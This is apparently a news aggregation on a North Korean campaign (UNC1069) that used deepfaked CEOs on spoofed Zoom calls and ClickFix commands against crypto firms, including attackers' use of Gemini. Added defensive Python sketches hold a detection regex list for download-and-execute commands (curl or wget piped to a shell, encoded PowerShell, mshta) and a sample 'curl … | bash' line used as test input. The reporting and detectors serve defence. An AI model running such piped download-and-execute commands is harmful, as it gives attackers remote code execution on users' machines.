2 Sources
[1]
Google Warns of AI-Powered North Korean Malware Campaign Targeting Crypto, DeFi - Decrypt
Experts warn that trusted digital identities are becoming the weakest link.

Google's security team at Mandiant has warned that North Korean hackers are incorporating artificial intelligence-generated deepfakes into fake video meetings as part of increasingly sophisticated attacks against crypto companies, according to a report released Monday.

Mandiant said it recently investigated an intrusion at a fintech company that it attributes to UNC1069, or "CryptoCore", a threat actor linked with high confidence to North Korea. The attack used a compromised Telegram account, a spoofed Zoom meeting, and a so-called ClickFix technique to trick the victim into running malicious commands. Investigators also found evidence that AI-generated video was used to deceive the target during the fake meeting.

"Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives," the report said.

The warning comes as North Korea's cryptocurrency thefts continue to grow in scale. In mid-December, blockchain analytics firm Chainalysis said North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase from the year before. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined.

The findings highlight a broader shift in how state-linked cybercriminals are operating. Rather than relying on mass phishing campaigns, CryptoCore and similar groups are focusing on highly tailored attacks that exploit trust in routine digital interactions, such as calendar invites and video calls. In this way, North Korea is achieving larger thefts through fewer, more targeted incidents.

According to Mandiant, the attack began when the victim was contacted on Telegram by what appeared to be a known cryptocurrency executive whose account had already been compromised. After building rapport, the attacker sent a Calendly link for a 30-minute meeting that directed the victim to a fake Zoom call hosted on the group's own infrastructure. During the call, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO.

Once the meeting began, the attackers claimed there were audio problems and instructed the victim to run "troubleshooting" commands, a ClickFix technique that ultimately triggered the malware infection. Forensic analysis later identified seven distinct malware families on the victim's system, deployed in an apparent attempt to harvest credentials, browser data and session tokens for financial theft and future impersonation.

Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, said the attack reflects a pattern he is seeing repeatedly against people whose jobs depend on remote meetings and rapid coordination.

"The effectiveness of this approach comes from how little has to look unusual," Edwards said. "The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene."

Edwards said deepfake video is typically introduced at escalation points, such as live calls, where seeing a familiar face can override doubts created by unexpected requests or technical issues. "Seeing what appears to be a real person on camera is often enough to override doubt created by an unexpected request or technical issue. The goal is not prolonged interaction, but just enough realism to move the victim to the next step," he said.

He added that AI is now being used to support impersonation outside of live calls. "It is used to draft messages, correct tone of voice, and mirror the way someone normally communicates with colleagues or friends. That makes routine messages harder to question and reduces the chance that a recipient pauses long enough to verify the interaction," he explained.

Edwards warned the risk will increase as AI agents are introduced into everyday communication and decision-making. "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process," he said.

It's "unrealistic" to expect most users to know how to spot a deepfake, Edwards said, adding that "The answer is not asking users to pay closer attention, but building systems that protect them by default. That means improving how authenticity is signalled and verified, so users can quickly understand whether content is real, synthetic, or unverified without relying on instinct, familiarity, or manual investigation."
[2]
AI-assisted hacking group hits targets with a complicated 'social engineering' scam that involves deepfaked CEOs, spoofed Zoom calls and a malicious troubleshooting program
This is one of many scams made in tandem with AI tools right now.

A hacking group reportedly based out of North Korea has come up with a "new tooling and AI-enabled social engineering" scam, according to Google, and it's pretty complicated. Effectively, it uses a hacked account to send a Zoom link via a calendar invite to an uncompromised account. That version of Zoom is, in fact, a spoof, and what targets are met with is a deepfaked version of the account owner. Google's report notes that a version of this deepfake takes the form "of a CEO from another cryptocurrency company."

Once in the meeting, the deepfaked user claims to have technical issues and directs the target on how to troubleshoot their PC. The troubleshooting prompt leads them to run an infected string of commands that then unleashes a series of backdoors and data miners on the victim's PC. Google calls it "AI-enabled social engineering" and notes 7 new malware families used in the attack.

UNC1069 are the actors Google has identified as being behind the scam. They have reportedly been active since 2018 and were found to have been using Gemini last year to "develop code to steal cryptocurrency, as well as to craft fraudulent instructions impersonating a software update to extract user credentials". Google says UNC1069 is "employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives."

This hack needs access to an account to start in the first place, so Google notes further attacks have "a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim's identity and data." Though Google states that the account linked to the group has been terminated, Gemini was used at some point "to develop tooling, conduct operational research, and assist during the reconnaissance stages."

Gemini is not the only AI tool being used in similar cybercrimes. Antivirus creator and cybersecurity company Kaspersky claims hacking group BlueNoroff is using GPT-4o to enhance images to convince targets. As AI gets more impressive and complicated, so too will the scams to accompany it. One can only hope that anti-scam measures become equally clever.
Google's Mandiant security team has exposed a sophisticated North Korean malware campaign using AI-generated deepfakes and spoofed Zoom calls to target cryptocurrency companies. The campaign is attributed to UNC1069, also known as CryptoCore; according to Chainalysis, North Korean hackers stole $2.02 billion in cryptocurrency in 2025 alone, a 51% increase from the previous year. These AI-enabled social engineering attacks exploit digital trust through fake video meetings with deepfaked CEOs, marking a dangerous evolution in cybercrime.
Google's security team at Mandiant has issued an urgent warning about North Korean malware campaigns that leverage AI-generated deepfakes to target cryptocurrency companies and DeFi platforms [1]. The threat actor, identified as UNC1069 or CryptoCore, has evolved its tactics to include AI-enabled social engineering that exploits trust in routine digital interactions [1]. According to the Monday report, these attacks represent a significant shift from mass phishing campaigns to highly tailored operations targeting cryptocurrency companies, venture capital firms, and their executives [1].
Source: Decrypt
The scale of North Korean malware operations has reached alarming levels. Blockchain analytics firm Chainalysis reported that North Korean hackers stole $2.02 billion in cryptocurrency in 2025, representing a 51% increase from the previous year [1]. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined [1]. This pattern reveals that North Korea is achieving larger cryptocurrency thefts through fewer, more targeted incidents that bypass traditional cybersecurity defenses.

Mandiant's investigation into a recent fintech company intrusion revealed the sophisticated mechanics of these AI-powered attacks [1]. The attack begins when victims are contacted via Telegram by what appears to be a known cryptocurrency executive whose account has already been compromised [1]. After building rapport, the attacker sends a Calendly link directing victims to spoofed Zoom calls hosted on the group's own infrastructure [1]. During these fake video meetings, victims encounter deepfake video of well-known crypto CEOs [1][2].
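The spoofed meeting step works because the link arrives through a trusted channel and nobody inspects where it actually points. As a rough illustration of the kind of default-on safeguard this implies, and not anything described in the Mandiant report, the Python sketch below checks whether a meeting URL's host belongs to an expected provider before it is opened; the allowlist and function name are hypothetical.

```python
from urllib.parse import urlparse

# Hypothetical allowlist of hosts a legitimate meeting link should resolve to.
TRUSTED_MEETING_HOSTS = {"zoom.us", "meet.google.com", "teams.microsoft.com"}

def is_trusted_meeting_link(url: str) -> bool:
    """Return True only if the URL uses HTTPS and its host is a trusted
    meeting domain or a subdomain of one (e.g. us02web.zoom.us)."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or not parsed.hostname:
        return False
    host = parsed.hostname.lower()
    return any(host == d or host.endswith("." + d) for d in TRUSTED_MEETING_HOSTS)

# A lookalike domain on attacker-controlled infrastructure fails the check.
print(is_trusted_meeting_link("https://us02web.zoom.us/j/123456789"))  # True
print(is_trusted_meeting_link("https://zoom-call-support.com/j/123"))  # False
```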
Once the meeting begins, attackers claim audio problems and instruct victims to run a malicious troubleshooting program using the ClickFix technique [1][2]. This triggers the malware infection, with forensic analysis identifying seven distinct malware families designed to harvest user credentials, browser data, and session tokens for financial theft and future impersonation [1][2].
Source: PC Gamer
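The ClickFix step succeeds because pasting a "fix" into a terminal feels like routine troubleshooting. Purely as an illustrative heuristic, not tooling attributed to Mandiant or Google, the sketch below flags pasted commands that match common download-and-execute shapes; the pattern list and function name are assumptions for the example.

```python
import re

# Illustrative patterns for commands that fetch and immediately execute
# remote code -- the general shape a ClickFix "troubleshooting" lure takes.
SUSPICIOUS_PATTERNS = [
    r"curl\s+[^|;]+\|\s*(ba)?sh",            # curl ... | sh / bash
    r"wget\s+[^|;]+\|\s*(ba)?sh",            # wget ... | sh / bash
    r"powershell[^\n]*-enc(odedcommand)?",   # encoded PowerShell payloads
    r"mshta\s+https?://",                    # mshta fetching a remote script
]

def looks_like_clickfix(command: str) -> bool:
    """Return True if a pasted command matches a download-and-execute pattern."""
    return any(re.search(p, command, re.IGNORECASE) for p in SUSPICIOUS_PATTERNS)

print(looks_like_clickfix("curl -s https://example.com/fix.sh | bash"))  # True
print(looks_like_clickfix("ipconfig /all"))                              # False
```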
Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, explained that these attacks target professionals whose jobs depend on remote meetings and rapid coordination [1]. "The effectiveness of this approach comes from how little has to look unusual. The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene," Edwards said [1]. This exploitation of digital trust represents a fundamental shift in cybercrime tactics, where social engineering bypasses traditional security measures.
Google's report reveals that UNC1069, active since 2018, has been using Gemini to develop code for cryptocurrency theft and to craft fraudulent instructions impersonating software updates to extract user credentials [2]. The AI tool was also employed "to develop tooling, conduct operational research, and assist during the reconnaissance stages" [2]. Gemini is not the only AI tool being weaponized: cybersecurity company Kaspersky claims hacking group BlueNoroff is using GPT-4o to enhance images to convince targets [2].
Edwards warned that AI is now being used beyond live calls to draft messages, correct tone of voice, and mirror normal communication patterns, making routine messages harder to question [1]. He added that the risk will escalate as AI agents are introduced into everyday communication: "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process" [1].
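One way to read Edwards's warning is that agents need a default-deny posture for sensitive actions. The sketch below is a hypothetical policy gate, not a cheqd or Google design: an agent checks whether the requesting identity has been verified before it will act on someone's behalf.

```python
from dataclasses import dataclass

# Actions an agent might perform autonomously; the set is illustrative.
SENSITIVE_ACTIONS = {"schedule_call", "send_message", "initiate_payment"}

@dataclass
class AgentRequest:
    sender_id: str
    sender_verified: bool  # e.g. the result of a cryptographic identity check
    action: str

def should_execute(request: AgentRequest) -> bool:
    """Default-deny: sensitive actions require a verified sender identity,
    so a compromised or impersonated account cannot drive the agent
    at machine speed."""
    if request.action in SENSITIVE_ACTIONS:
        return request.sender_verified
    return True

# An unverified "executive" asking the agent to schedule a call is refused.
print(should_execute(AgentRequest("exec@fund.example", False, "schedule_call")))    # False
print(should_execute(AgentRequest("colleague@fund.example", True, "send_message"))) # True
```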
Mandiant observed that these attacks serve a dual purpose: enabling immediate cryptocurrency theft while fueling future social engineering campaigns by leveraging victims' identity and data [2]. This creates a compounding threat where each successful breach enables more convincing subsequent attacks.

Edwards emphasized that expecting users to spot deepfakes is "unrealistic," stating: "The answer is not asking users to pay closer attention, but building systems that protect them by default. That means improving how authenticity is signalled and verified, so users can quickly understand whether content is real, synthetic, or unverified without relying on instinct, familiarity, or manual investigation" [1]. As AI-powered attacks grow more sophisticated, the crypto industry faces an urgent need for verification systems that can counter scalable impersonation before digital trust becomes an insurmountable vulnerability in DeFi and broader cybersecurity infrastructure.
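Edwards's call for authenticity that is "signalled and verified" by default maps onto a standard cryptographic building block. As a minimal sketch, assuming Ed25519 signatures and the Python cryptography library (neither named in the articles), a meeting invite signed with a key bound to a verified identity can be checked automatically before the recipient ever has to rely on instinct:

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# The sender's keypair; in a real system the public key would be bound to a
# verified identity (e.g. a DID) rather than generated on the spot.
sender_key = Ed25519PrivateKey.generate()
sender_public = sender_key.public_key()

invite = b"Zoom call, Tuesday 15:00 UTC, https://us02web.zoom.us/j/123456789"
signature = sender_key.sign(invite)

def invite_is_authentic(public_key, message: bytes, sig: bytes) -> bool:
    """Verify the invite against the sender's known public key; any
    tampering or impersonation makes verification fail."""
    try:
        public_key.verify(sig, message)
        return True
    except InvalidSignature:
        return False

print(invite_is_authentic(sender_public, invite, signature))                 # True
print(invite_is_authentic(sender_public, invite + b" (edited)", signature))  # False
```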